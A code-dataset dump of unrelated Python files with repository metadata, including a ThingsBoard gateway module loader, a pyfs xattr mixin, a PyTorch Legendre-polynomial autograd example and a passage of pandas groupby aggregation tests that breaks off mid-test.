.filter(CERNAccessRequest.has_identity_info,
Event.end_dt < now_utc() - CERNAccessPlugin.settings.get('delete_personal_data_after')))
for req in query:
req.clear_identity_data()
CERNAccessPlugin.logger.info('Removing personal data for registrant %d', req.registration_id)
db.session.flush()
def sanitize_license_plate(number):
"""Sanitize a license plate number to [A-Z0-9]+, no dashes/spaces."""
number = re.sub(r'[ -]', '', number.strip().upper())
return number if re.match(r'^[A-Z0-9]+$', number) else None
class AdamsError(Exception):
pass
| 43.136364
| 117
| 0.743197
|
4a0ea372492266f6577b137f695ba49099186bd7
| 30
|
py
|
Python
|
app/utils/exceptions/__init__.py
|
InNickF/django-template
|
a8a9e1e5cd8cf63543cc78ef4fbd6bce060a448b
|
[
"MIT"
] | 3
|
2020-09-20T11:21:01.000Z
|
2021-01-31T18:55:54.000Z
|
app/utils/exceptions/__init__.py
|
InNickF/django-template
|
a8a9e1e5cd8cf63543cc78ef4fbd6bce060a448b
|
[
"MIT"
] | 2
|
2020-09-21T09:53:32.000Z
|
2021-06-10T19:40:41.000Z
|
app/utils/exceptions/__init__.py
|
InNickF/django-template
|
a8a9e1e5cd8cf63543cc78ef4fbd6bce060a448b
|
[
"MIT"
] | 2
|
2021-01-17T20:59:23.000Z
|
2021-01-31T18:55:58.000Z
|
"""Custom app's exceptions"""
| 15
| 29
| 0.666667
|
4a0ea3bec05e713f8fd78035f6abd451d2e35a8f
| 3,501
|
py
|
Python
|
thingsboard-gateway/thingsboard_gateway/tb_utility/tb_loader.py
|
drexelwireless/thingsboard-gateway
|
c4af30c3874c4e507c14566e332d2b4628e506e8
|
[
"Apache-2.0"
] | 1
|
2022-02-10T10:03:43.000Z
|
2022-02-10T10:03:43.000Z
|
thingsboard-gateway/thingsboard_gateway/tb_utility/tb_loader.py
|
drexelwireless/thingsboard-gateway
|
c4af30c3874c4e507c14566e332d2b4628e506e8
|
[
"Apache-2.0"
] | null | null | null |
thingsboard-gateway/thingsboard_gateway/tb_utility/tb_loader.py
|
drexelwireless/thingsboard-gateway
|
c4af30c3874c4e507c14566e332d2b4628e506e8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from importlib.util import module_from_spec, spec_from_file_location
from inspect import getmembers, isclass
from logging import getLogger
from os import listdir, path
log = getLogger("service")
EXTENSIONS_FOLDER = '/extensions'.replace('/', path.sep)
CONNECTORS_FOLDER = '/connectors'.replace('/', path.sep)
GRPC_CONNECTORS_FOLDER = '/grpc_connectors'.replace('/', path.sep)
DEB_INSTALLATION_EXTENSION_PATH = '/var/lib/thingsboard_gateway/extensions'.replace('/', path.sep)
class TBModuleLoader:
PATHS = []
LOADED_CONNECTORS = {}
@staticmethod
def find_paths():
root_path = path.abspath(path.dirname(path.dirname(__file__)))
log.debug("Root path is: " + root_path)
if path.exists(DEB_INSTALLATION_EXTENSION_PATH):
log.debug("Debian installation extensions folder exists.")
TBModuleLoader.PATHS.append(DEB_INSTALLATION_EXTENSION_PATH)
TBModuleLoader.PATHS.append(root_path + EXTENSIONS_FOLDER)
TBModuleLoader.PATHS.append(root_path + CONNECTORS_FOLDER)
TBModuleLoader.PATHS.append(root_path + GRPC_CONNECTORS_FOLDER)
@staticmethod
def import_module(extension_type, module_name):
if len(TBModuleLoader.PATHS) == 0:
TBModuleLoader.find_paths()
buffered_module_name = extension_type + module_name
if TBModuleLoader.LOADED_CONNECTORS.get(buffered_module_name) is not None:
return TBModuleLoader.LOADED_CONNECTORS[buffered_module_name]
try:
for current_path in TBModuleLoader.PATHS:
current_extension_path = current_path + path.sep + extension_type
if path.exists(current_extension_path):
for file in listdir(current_extension_path):
if not file.startswith('__') and file.endswith('.py'):
try:
module_spec = spec_from_file_location(module_name, current_extension_path + path.sep + file)
log.debug(module_spec)
if module_spec is None:
continue
module = module_from_spec(module_spec)
module_spec.loader.exec_module(module)
for extension_class in getmembers(module, isclass):
if module_name in extension_class:
log.info("Import %s from %s.", module_name, current_extension_path)
TBModuleLoader.LOADED_CONNECTORS[buffered_module_name] = extension_class[1]
return extension_class[1]
except ImportError:
continue
except Exception as e:
log.exception(e)
| 46.68
| 124
| 0.628963
|
4a0ea4076d5fd65f186079405d2073af10e69a68
| 339
|
py
|
Python
|
cart/migrations/0020_remove_comment_status.py
|
Mambodiev/ecom_website
|
ced03d61a99a7d657f7cb0106dbb9cf1ab15e367
|
[
"MIT"
] | null | null | null |
cart/migrations/0020_remove_comment_status.py
|
Mambodiev/ecom_website
|
ced03d61a99a7d657f7cb0106dbb9cf1ab15e367
|
[
"MIT"
] | 1
|
2022-03-30T21:19:09.000Z
|
2022-03-30T21:19:09.000Z
|
cart/migrations/0020_remove_comment_status.py
|
Mambodiev/ecom_website
|
ced03d61a99a7d657f7cb0106dbb9cf1ab15e367
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2021-07-26 07:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cart', '0019_rename_approuved_comment_approved'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='status',
),
]
| 18.833333
| 59
| 0.60767
|
4a0ea4196a23089abb2fab789f31cdc11d2a8325
| 82
|
py
|
Python
|
Modules/triangle_03/03_triangle.py
|
MihailMarkovski/Python-Advanced-2020
|
8edea78cbe5588a409ba9bc3767861250f58c1a6
|
[
"MIT"
] | 4
|
2020-09-19T13:53:19.000Z
|
2020-11-01T18:34:53.000Z
|
Modules/triangle_03/03_triangle.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
Modules/triangle_03/03_triangle.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
from Modules.triangle_03 import triangle_fn as tf
tf.draw_triangle(int(input()))
| 20.5
| 49
| 0.804878
|
4a0ea43038bad194749cdbbc66cf37f6f351c475
| 1,695
|
py
|
Python
|
fs/osfs/xattrs.py
|
rimrim/pyfs
|
ce9f3c76468a0779a0517ea7d7c191caf1bffd25
|
[
"BSD-3-Clause"
] | 1
|
2021-07-15T22:45:17.000Z
|
2021-07-15T22:45:17.000Z
|
fs/osfs/xattrs.py
|
rimrim/pyfs
|
ce9f3c76468a0779a0517ea7d7c191caf1bffd25
|
[
"BSD-3-Clause"
] | null | null | null |
fs/osfs/xattrs.py
|
rimrim/pyfs
|
ce9f3c76468a0779a0517ea7d7c191caf1bffd25
|
[
"BSD-3-Clause"
] | null | null | null |
"""
fs.osfs.xattrs
==============
Extended-attribute support for OSFS
"""
import os
import sys
import errno
from fs.errors import *
from fs.path import *
from fs.base import FS
try:
import xattr
except ImportError:
xattr = None
if xattr is not None:
class OSFSXAttrMixin(object):
"""Mixin providing extended-attribute support via the 'xattr' module"""
def __init__(self, *args, **kwargs):
super(OSFSXAttrMixin, self).__init__(*args, **kwargs)
@convert_os_errors
def setxattr(self, path, key, value):
xattr.xattr(self.getsyspath(path))[key]=value
@convert_os_errors
def getxattr(self, path, key, default=None):
try:
return xattr.xattr(self.getsyspath(path)).get(key)
except KeyError:
return default
@convert_os_errors
def delxattr(self, path, key):
try:
del xattr.xattr(self.getsyspath(path))[key]
except KeyError:
pass
@convert_os_errors
def listxattrs(self, path):
return list(xattr.xattr(self.getsyspath(path)).keys())
else:
class OSFSXAttrMixin(object):
"""Mixin disable extended-attribute support."""
def __init__(self, *args, **kwargs):
super(OSFSXAttrMixin, self).__init__(*args, **kwargs)
def getxattr(self,path,key,default=None):
raise UnsupportedError
def setxattr(self,path,key,value):
raise UnsupportedError
def delxattr(self,path,key):
raise UnsupportedError
def listxattrs(self,path):
raise UnsupportedError
| 22.905405
| 79
| 0.6
|
4a0ea4fc9d827e023dbbddfe368ba8c39c22351d
| 3,940
|
py
|
Python
|
beginner_source/examples_autograd/polynomial_custom_function.py
|
d2weber/tutorials
|
c08519b873566369d19a616c491ce2a9d4d5dde1
|
[
"BSD-3-Clause"
] | null | null | null |
beginner_source/examples_autograd/polynomial_custom_function.py
|
d2weber/tutorials
|
c08519b873566369d19a616c491ce2a9d4d5dde1
|
[
"BSD-3-Clause"
] | null | null | null |
beginner_source/examples_autograd/polynomial_custom_function.py
|
d2weber/tutorials
|
c08519b873566369d19a616c491ce2a9d4d5dde1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
r"""
PyTorch: Defining New autograd Functions
----------------------------------------
A third order polynomial, trained to predict :math:`y=\sin(x)` from :math:`-\pi`
to :math:`\pi` by minimizing squared Euclidean distance. Instead of writing the
polynomial as :math:`y=a+bx+cx^2+dx^3`, we write the polynomial as
:math:`y=a+b P_3(c+dx)` where :math:`P_3(x)=\frac{1}{2}\left(5x^3-3x\right)` is
the `Legendre polynomial`_ of degree three.
.. _Legendre polynomial:
https://en.wikipedia.org/wiki/Legendre_polynomials
This implementation computes the forward pass using operations on PyTorch
Tensors, and uses PyTorch autograd to compute gradients.
In this implementation we implement our own custom autograd function to perform
:math:`P_3'(x)`. By mathematics, :math:`P_3'(x)=\frac{3}{2}\left(5x^2-1\right)`
"""
import torch
import math
class LegendrePolynomial3(torch.autograd.Function):
"""
We can implement our own custom autograd Functions by subclassing
torch.autograd.Function and implementing the forward and backward passes
which operate on Tensors.
"""
@staticmethod
def forward(ctx, input):
"""
In the forward pass we receive a Tensor containing the input and return
a Tensor containing the output. ctx is a context object that can be used
to stash information for backward computation. You can cache arbitrary
objects for use in the backward pass using the ctx.save_for_backward method.
"""
ctx.save_for_backward(input)
return 0.5 * (5 * input ** 3 - 3 * input)
@staticmethod
def backward(ctx, grad_output):
"""
In the backward pass we receive a Tensor containing the gradient of the loss
with respect to the output, and we need to compute the gradient of the loss
with respect to the input.
"""
input, = ctx.saved_tensors
return grad_output * 1.5 * (5 * input ** 2 - 1)
dtype = torch.float
device = torch.device("cpu")
# device = torch.device("cuda:0") # Uncomment this to run on GPU
# Create Tensors to hold input and outputs.
# By default, requires_grad=False, which indicates that we do not need to
# compute gradients with respect to these Tensors during the backward pass.
x = torch.linspace(-math.pi, math.pi, 2000, device=device, dtype=dtype)
y = torch.sin(x)
# Create random Tensors for weights. For this example, we need
# 4 weights: y = a + b * P3(c + d * x), these weights need to be initialized
# not too far from the correct result to ensure convergence.
# Setting requires_grad=True indicates that we want to compute gradients with
# respect to these Tensors during the backward pass.
a = torch.full((), 0.0, device=device, dtype=dtype, requires_grad=True)
b = torch.full((), -1.0, device=device, dtype=dtype, requires_grad=True)
c = torch.full((), 0.0, device=device, dtype=dtype, requires_grad=True)
d = torch.full((), 0.3, device=device, dtype=dtype, requires_grad=True)
learning_rate = 5e-6
for t in range(2000):
# To apply our Function, we use Function.apply method. We alias this as 'P3'.
P3 = LegendrePolynomial3.apply
# Forward pass: compute predicted y using operations; we compute
# P3 using our custom autograd operation.
y_pred = a + b * P3(c + d * x)
# Compute and print loss
loss = (y_pred - y).pow(2).sum()
if t % 100 == 99:
print(t, loss.item())
# Use autograd to compute the backward pass.
loss.backward()
# Update weights using gradient descent
with torch.no_grad():
a -= learning_rate * a.grad
b -= learning_rate * b.grad
c -= learning_rate * c.grad
d -= learning_rate * d.grad
# Manually zero the gradients after updating weights
a.grad = None
b.grad = None
c.grad = None
d.grad = None
print(f'Result: y = {a.item()} + {b.item()} * P3({c.item()} + {d.item()} x)')
| 37.52381
| 84
| 0.671827
|
4a0ea5f5208730e0111b51f6d86f5056cfa0f96e
| 38,787
|
py
|
Python
|
pandas/tests/groupby/aggregate/test_aggregate.py
|
gabriellm1/pandas
|
020040b3b92516b445ddd8daba3b9818340e82d4
|
[
"BSD-3-Clause"
] | 1
|
2020-08-18T16:49:16.000Z
|
2020-08-18T16:49:16.000Z
|
pandas/tests/groupby/aggregate/test_aggregate.py
|
gabriellm1/pandas
|
020040b3b92516b445ddd8daba3b9818340e82d4
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/tests/groupby/aggregate/test_aggregate.py
|
gabriellm1/pandas
|
020040b3b92516b445ddd8daba3b9818340e82d4
|
[
"BSD-3-Clause"
] | 2
|
2021-07-17T19:28:31.000Z
|
2021-11-28T17:14:58.000Z
|
"""
test .agg behavior / note that .apply is tested generally in test_groupby.py
"""
import functools
from functools import partial
import numpy as np
import pytest
from pandas.errors import PerformanceWarning
from pandas.core.dtypes.common import is_integer_dtype
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, Series, concat
import pandas._testing as tm
from pandas.core.base import SpecificationError
from pandas.core.groupby.grouper import Grouping
def test_groupby_agg_no_extra_calls():
# GH#31760
df = pd.DataFrame({"key": ["a", "b", "c", "c"], "value": [1, 2, 3, 4]})
gb = df.groupby("key")["value"]
def dummy_func(x):
assert len(x) != 0
return x.sum()
gb.agg(dummy_func)
def test_agg_regression1(tsframe):
grouped = tsframe.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
def test_agg_must_agg(df):
grouped = df.groupby("A")["C"]
msg = "Must produce aggregated value"
with pytest.raises(Exception, match=msg):
grouped.agg(lambda x: x.describe())
with pytest.raises(Exception, match=msg):
grouped.agg(lambda x: x.index[:2])
def test_agg_ser_multi_key(df):
# TODO(wesm): unused
ser = df.C # noqa
f = lambda x: x.sum()
results = df.C.groupby([df.A, df.B]).aggregate(f)
expected = df.groupby(["A", "B"]).sum()["C"]
tm.assert_series_equal(results, expected)
def test_groupby_aggregation_mixed_dtype():
# GH 6212
expected = DataFrame(
{
"v1": [5, 5, 7, np.nan, 3, 3, 4, 1],
"v2": [55, 55, 77, np.nan, 33, 33, 44, 11],
},
index=MultiIndex.from_tuples(
[
(1, 95),
(1, 99),
(2, 95),
(2, 99),
("big", "damp"),
("blue", "dry"),
("red", "red"),
("red", "wet"),
],
names=["by1", "by2"],
),
)
df = DataFrame(
{
"v1": [1, 3, 5, 7, 8, 3, 5, np.nan, 4, 5, 7, 9],
"v2": [11, 33, 55, 77, 88, 33, 55, np.nan, 44, 55, 77, 99],
"by1": ["red", "blue", 1, 2, np.nan, "big", 1, 2, "red", 1, np.nan, 12],
"by2": [
"wet",
"dry",
99,
95,
np.nan,
"damp",
95,
99,
"red",
99,
np.nan,
np.nan,
],
}
)
g = df.groupby(["by1", "by2"])
result = g[["v1", "v2"]].mean()
tm.assert_frame_equal(result, expected)
def test_groupby_aggregation_multi_level_column():
# GH 29772
lst = [
[True, True, True, False],
[True, False, np.nan, False],
[True, True, np.nan, False],
[True, True, np.nan, False],
]
df = pd.DataFrame(
data=lst,
columns=pd.MultiIndex.from_tuples([("A", 0), ("A", 1), ("B", 0), ("B", 1)]),
)
result = df.groupby(level=1, axis=1).sum()
expected = pd.DataFrame({0: [2.0, 1, 1, 1], 1: [1, 0, 1, 1]})
tm.assert_frame_equal(result, expected)
def test_agg_apply_corner(ts, tsframe):
# nothing to group, all NA
grouped = ts.groupby(ts * np.nan)
assert ts.dtype == np.float64
# groupby float64 values results in Float64Index
exp = Series([], dtype=np.float64, index=pd.Index([], dtype=np.float64))
tm.assert_series_equal(grouped.sum(), exp)
tm.assert_series_equal(grouped.agg(np.sum), exp)
tm.assert_series_equal(grouped.apply(np.sum), exp, check_index_type=False)
# DataFrame
grouped = tsframe.groupby(tsframe["A"] * np.nan)
exp_df = DataFrame(
columns=tsframe.columns, dtype=float, index=pd.Index([], dtype=np.float64)
)
tm.assert_frame_equal(grouped.sum(), exp_df, check_names=False)
tm.assert_frame_equal(grouped.agg(np.sum), exp_df, check_names=False)
tm.assert_frame_equal(grouped.apply(np.sum), exp_df.iloc[:, :0], check_names=False)
def test_agg_grouping_is_list_tuple(ts):
df = tm.makeTimeDataFrame()
grouped = df.groupby(lambda x: x.year)
grouper = grouped.grouper.groupings[0].grouper
grouped.grouper.groupings[0] = Grouping(ts.index, list(grouper))
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
grouped.grouper.groupings[0] = Grouping(ts.index, tuple(grouper))
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
def test_agg_python_multiindex(mframe):
grouped = mframe.groupby(["A", "B"])
result = grouped.agg(np.mean)
expected = grouped.mean()
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"groupbyfunc", [lambda x: x.weekday(), [lambda x: x.month, lambda x: x.weekday()]]
)
def test_aggregate_str_func(tsframe, groupbyfunc):
grouped = tsframe.groupby(groupbyfunc)
# single series
result = grouped["A"].agg("std")
expected = grouped["A"].std()
tm.assert_series_equal(result, expected)
# group frame by function name
result = grouped.aggregate("var")
expected = grouped.var()
tm.assert_frame_equal(result, expected)
# group frame by function dict
result = grouped.agg({"A": "var", "B": "std", "C": "mean", "D": "sem"})
expected = DataFrame(
{
"A": grouped["A"].var(),
"B": grouped["B"].std(),
"C": grouped["C"].mean(),
"D": grouped["D"].sem(),
}
)
tm.assert_frame_equal(result, expected)
def test_aggregate_item_by_item(df):
grouped = df.groupby("A")
aggfun = lambda ser: ser.size
result = grouped.agg(aggfun)
foo = (df.A == "foo").sum()
bar = (df.A == "bar").sum()
K = len(result.columns)
# GH5782
# odd comparisons can result here, so cast to make easy
exp = pd.Series(
np.array([foo] * K), index=list("BCD"), dtype=np.float64, name="foo"
)
tm.assert_series_equal(result.xs("foo"), exp)
exp = pd.Series(
np.array([bar] * K), index=list("BCD"), dtype=np.float64, name="bar"
)
tm.assert_almost_equal(result.xs("bar"), exp)
def aggfun(ser):
return ser.size
result = DataFrame().groupby(df.A).agg(aggfun)
assert isinstance(result, DataFrame)
assert len(result) == 0
def test_wrap_agg_out(three_group):
grouped = three_group.groupby(["A", "B"])
def func(ser):
if ser.dtype == object:
raise TypeError
else:
return ser.sum()
result = grouped.aggregate(func)
exp_grouped = three_group.loc[:, three_group.columns != "C"]
expected = exp_grouped.groupby(["A", "B"]).aggregate(func)
tm.assert_frame_equal(result, expected)
def test_agg_multiple_functions_maintain_order(df):
# GH #610
funcs = [("mean", np.mean), ("max", np.max), ("min", np.min)]
result = df.groupby("A")["C"].agg(funcs)
exp_cols = Index(["mean", "max", "min"])
tm.assert_index_equal(result.columns, exp_cols)
def test_agg_multiple_functions_same_name():
# GH 30880
df = pd.DataFrame(
np.random.randn(1000, 3),
index=pd.date_range("1/1/2012", freq="S", periods=1000),
columns=["A", "B", "C"],
)
result = df.resample("3T").agg(
{"A": [partial(np.quantile, q=0.9999), partial(np.quantile, q=0.1111)]}
)
expected_index = pd.date_range("1/1/2012", freq="3T", periods=6)
expected_columns = MultiIndex.from_tuples([("A", "quantile"), ("A", "quantile")])
expected_values = np.array(
[df.resample("3T").A.quantile(q=q).values for q in [0.9999, 0.1111]]
).T
expected = pd.DataFrame(
expected_values, columns=expected_columns, index=expected_index
)
tm.assert_frame_equal(result, expected)
def test_agg_multiple_functions_same_name_with_ohlc_present():
# GH 30880
# ohlc expands dimensions, so different test to the above is required.
df = pd.DataFrame(
np.random.randn(1000, 3),
index=pd.date_range("1/1/2012", freq="S", periods=1000),
columns=["A", "B", "C"],
)
result = df.resample("3T").agg(
{"A": ["ohlc", partial(np.quantile, q=0.9999), partial(np.quantile, q=0.1111)]}
)
expected_index = pd.date_range("1/1/2012", freq="3T", periods=6)
expected_columns = pd.MultiIndex.from_tuples(
[
("A", "ohlc", "open"),
("A", "ohlc", "high"),
("A", "ohlc", "low"),
("A", "ohlc", "close"),
("A", "quantile", "A"),
("A", "quantile", "A"),
]
)
non_ohlc_expected_values = np.array(
[df.resample("3T").A.quantile(q=q).values for q in [0.9999, 0.1111]]
).T
expected_values = np.hstack([df.resample("3T").A.ohlc(), non_ohlc_expected_values])
expected = pd.DataFrame(
expected_values, columns=expected_columns, index=expected_index
)
# PerformanceWarning is thrown by `assert col in right` in assert_frame_equal
with tm.assert_produces_warning(PerformanceWarning):
tm.assert_frame_equal(result, expected)
def test_multiple_functions_tuples_and_non_tuples(df):
# #1359
funcs = [("foo", "mean"), "std"]
ex_funcs = [("foo", "mean"), ("std", "std")]
result = df.groupby("A")["C"].agg(funcs)
expected = df.groupby("A")["C"].agg(ex_funcs)
tm.assert_frame_equal(result, expected)
result = df.groupby("A").agg(funcs)
expected = df.groupby("A").agg(ex_funcs)
tm.assert_frame_equal(result, expected)
def test_more_flexible_frame_multi_function(df):
grouped = df.groupby("A")
exmean = grouped.agg({"C": np.mean, "D": np.mean})
exstd = grouped.agg({"C": np.std, "D": np.std})
expected = concat([exmean, exstd], keys=["mean", "std"], axis=1)
expected = expected.swaplevel(0, 1, axis=1).sort_index(level=0, axis=1)
d = {"C": [np.mean, np.std], "D": [np.mean, np.std]}
result = grouped.aggregate(d)
tm.assert_frame_equal(result, expected)
# be careful
result = grouped.aggregate({"C": np.mean, "D": [np.mean, np.std]})
expected = grouped.aggregate({"C": np.mean, "D": [np.mean, np.std]})
tm.assert_frame_equal(result, expected)
def foo(x):
return np.mean(x)
def bar(x):
return np.std(x, ddof=1)
# this uses column selection & renaming
msg = r"nested renamer is not supported"
with pytest.raises(SpecificationError, match=msg):
d = dict([["C", np.mean], ["D", dict([["foo", np.mean], ["bar", np.std]])]])
grouped.aggregate(d)
# But without renaming, these functions are OK
d = {"C": [np.mean], "D": [foo, bar]}
grouped.aggregate(d)
def test_multi_function_flexible_mix(df):
# GH #1268
grouped = df.groupby("A")
# Expected
d = {"C": {"foo": "mean", "bar": "std"}, "D": {"sum": "sum"}}
# this uses column selection & renaming
msg = r"nested renamer is not supported"
with pytest.raises(SpecificationError, match=msg):
grouped.aggregate(d)
# Test 1
d = {"C": {"foo": "mean", "bar": "std"}, "D": "sum"}
# this uses column selection & renaming
with pytest.raises(SpecificationError, match=msg):
grouped.aggregate(d)
# Test 2
d = {"C": {"foo": "mean", "bar": "std"}, "D": "sum"}
# this uses column selection & renaming
with pytest.raises(SpecificationError, match=msg):
grouped.aggregate(d)
def test_groupby_agg_coercing_bools():
# issue 14873
dat = pd.DataFrame({"a": [1, 1, 2, 2], "b": [0, 1, 2, 3], "c": [None, None, 1, 1]})
gp = dat.groupby("a")
index = Index([1, 2], name="a")
result = gp["b"].aggregate(lambda x: (x != 0).all())
expected = Series([False, True], index=index, name="b")
tm.assert_series_equal(result, expected)
result = gp["c"].aggregate(lambda x: x.isnull().all())
expected = Series([True, False], index=index, name="c")
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"op",
[
lambda x: x.sum(),
lambda x: x.cumsum(),
lambda x: x.transform("sum"),
lambda x: x.transform("cumsum"),
lambda x: x.agg("sum"),
lambda x: x.agg("cumsum"),
],
)
def test_bool_agg_dtype(op):
# GH 7001
# Bool sum aggregations result in int
df = pd.DataFrame({"a": [1, 1], "b": [False, True]})
s = df.set_index("a")["b"]
result = op(df.groupby("a"))["b"].dtype
assert is_integer_dtype(result)
result = op(s.groupby("a")).dtype
assert is_integer_dtype(result)
def test_order_aggregate_multiple_funcs():
# GH 25692
df = pd.DataFrame({"A": [1, 1, 2, 2], "B": [1, 2, 3, 4]})
res = df.groupby("A").agg(["sum", "max", "mean", "ohlc", "min"])
result = res.columns.levels[1]
expected = pd.Index(["sum", "max", "mean", "ohlc", "min"])
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("dtype", [np.int64, np.uint64])
@pytest.mark.parametrize("how", ["first", "last", "min", "max", "mean", "median"])
def test_uint64_type_handling(dtype, how):
# GH 26310
df = pd.DataFrame({"x": 6903052872240755750, "y": [1, 2]})
expected = df.groupby("y").agg({"x": how})
df.x = df.x.astype(dtype)
result = df.groupby("y").agg({"x": how})
result.x = result.x.astype(np.int64)
tm.assert_frame_equal(result, expected, check_exact=True)
def test_func_duplicates_raises():
# GH28426
msg = "Function names"
df = pd.DataFrame({"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]})
with pytest.raises(SpecificationError, match=msg):
df.groupby("A").agg(["min", "min"])
@pytest.mark.parametrize(
"index",
[
pd.CategoricalIndex(list("abc")),
pd.interval_range(0, 3),
pd.period_range("2020", periods=3, freq="D"),
pd.MultiIndex.from_tuples([("a", 0), ("a", 1), ("b", 0)]),
],
)
def test_agg_index_has_complex_internals(index):
# GH 31223
df = DataFrame({"group": [1, 1, 2], "value": [0, 1, 0]}, index=index)
result = df.groupby("group").agg({"value": Series.nunique})
expected = DataFrame({"group": [1, 2], "value": [2, 1]}).set_index("group")
tm.assert_frame_equal(result, expected)
def test_agg_split_block():
# https://github.com/pandas-dev/pandas/issues/31522
df = pd.DataFrame(
{
"key1": ["a", "a", "b", "b", "a"],
"key2": ["one", "two", "one", "two", "one"],
"key3": ["three", "three", "three", "six", "six"],
}
)
result = df.groupby("key1").min()
expected = pd.DataFrame(
{"key2": ["one", "one"], "key3": ["six", "six"]},
index=pd.Index(["a", "b"], name="key1"),
)
tm.assert_frame_equal(result, expected)
def test_agg_split_object_part_datetime():
# https://github.com/pandas-dev/pandas/pull/31616
df = pd.DataFrame(
{
"A": pd.date_range("2000", periods=4),
"B": ["a", "b", "c", "d"],
"C": [1, 2, 3, 4],
"D": ["b", "c", "d", "e"],
"E": pd.date_range("2000", periods=4),
"F": [1, 2, 3, 4],
}
).astype(object)
result = df.groupby([0, 0, 0, 0]).min()
expected = pd.DataFrame(
{
"A": [pd.Timestamp("2000")],
"B": ["a"],
"C": [1],
"D": ["b"],
"E": [pd.Timestamp("2000")],
"F": [1],
}
)
tm.assert_frame_equal(result, expected)
class TestNamedAggregationSeries:
def test_series_named_agg(self):
df = pd.Series([1, 2, 3, 4])
gr = df.groupby([0, 0, 1, 1])
result = gr.agg(a="sum", b="min")
expected = pd.DataFrame(
{"a": [3, 7], "b": [1, 3]}, columns=["a", "b"], index=[0, 1]
)
tm.assert_frame_equal(result, expected)
result = gr.agg(b="min", a="sum")
expected = expected[["b", "a"]]
tm.assert_frame_equal(result, expected)
def test_no_args_raises(self):
gr = pd.Series([1, 2]).groupby([0, 1])
with pytest.raises(TypeError, match="Must provide"):
gr.agg()
# but we do allow this
result = gr.agg([])
expected = pd.DataFrame()
tm.assert_frame_equal(result, expected)
def test_series_named_agg_duplicates_no_raises(self):
# GH28426
gr = pd.Series([1, 2, 3]).groupby([0, 0, 1])
grouped = gr.agg(a="sum", b="sum")
expected = pd.DataFrame({"a": [3, 3], "b": [3, 3]})
tm.assert_frame_equal(expected, grouped)
def test_mangled(self):
gr = pd.Series([1, 2, 3]).groupby([0, 0, 1])
result = gr.agg(a=lambda x: 0, b=lambda x: 1)
expected = pd.DataFrame({"a": [0, 0], "b": [1, 1]})
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"inp",
[
pd.NamedAgg(column="anything", aggfunc="min"),
("anything", "min"),
["anything", "min"],
],
)
def test_named_agg_nametuple(self, inp):
# GH34422
s = pd.Series([1, 1, 2, 2, 3, 3, 4, 5])
msg = f"func is expected but received {type(inp).__name__}"
with pytest.raises(TypeError, match=msg):
s.groupby(s.values).agg(a=inp)
class TestNamedAggregationDataFrame:
def test_agg_relabel(self):
df = pd.DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
result = df.groupby("group").agg(a_max=("A", "max"), b_max=("B", "max"))
expected = pd.DataFrame(
{"a_max": [1, 3], "b_max": [6, 8]},
index=pd.Index(["a", "b"], name="group"),
columns=["a_max", "b_max"],
)
tm.assert_frame_equal(result, expected)
# order invariance
p98 = functools.partial(np.percentile, q=98)
result = df.groupby("group").agg(
b_min=("B", "min"),
a_min=("A", min),
a_mean=("A", np.mean),
a_max=("A", "max"),
b_max=("B", "max"),
a_98=("A", p98),
)
expected = pd.DataFrame(
{
"b_min": [5, 7],
"a_min": [0, 2],
"a_mean": [0.5, 2.5],
"a_max": [1, 3],
"b_max": [6, 8],
"a_98": [0.98, 2.98],
},
index=pd.Index(["a", "b"], name="group"),
columns=["b_min", "a_min", "a_mean", "a_max", "b_max", "a_98"],
)
tm.assert_frame_equal(result, expected)
def test_agg_relabel_non_identifier(self):
df = pd.DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
result = df.groupby("group").agg(**{"my col": ("A", "max")})
expected = pd.DataFrame(
{"my col": [1, 3]}, index=pd.Index(["a", "b"], name="group")
)
tm.assert_frame_equal(result, expected)
def test_duplicate_no_raises(self):
# GH 28426, if use same input function on same column,
# no error should raise
df = pd.DataFrame({"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]})
grouped = df.groupby("A").agg(a=("B", "min"), b=("B", "min"))
expected = pd.DataFrame(
{"a": [1, 3], "b": [1, 3]}, index=pd.Index([0, 1], name="A")
)
tm.assert_frame_equal(grouped, expected)
quant50 = functools.partial(np.percentile, q=50)
quant70 = functools.partial(np.percentile, q=70)
quant50.__name__ = "quant50"
quant70.__name__ = "quant70"
test = pd.DataFrame(
{"col1": ["a", "a", "b", "b", "b"], "col2": [1, 2, 3, 4, 5]}
)
grouped = test.groupby("col1").agg(
quantile_50=("col2", quant50), quantile_70=("col2", quant70)
)
expected = pd.DataFrame(
{"quantile_50": [1.5, 4.0], "quantile_70": [1.7, 4.4]},
index=pd.Index(["a", "b"], name="col1"),
)
tm.assert_frame_equal(grouped, expected)
def test_agg_relabel_with_level(self):
df = pd.DataFrame(
{"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]},
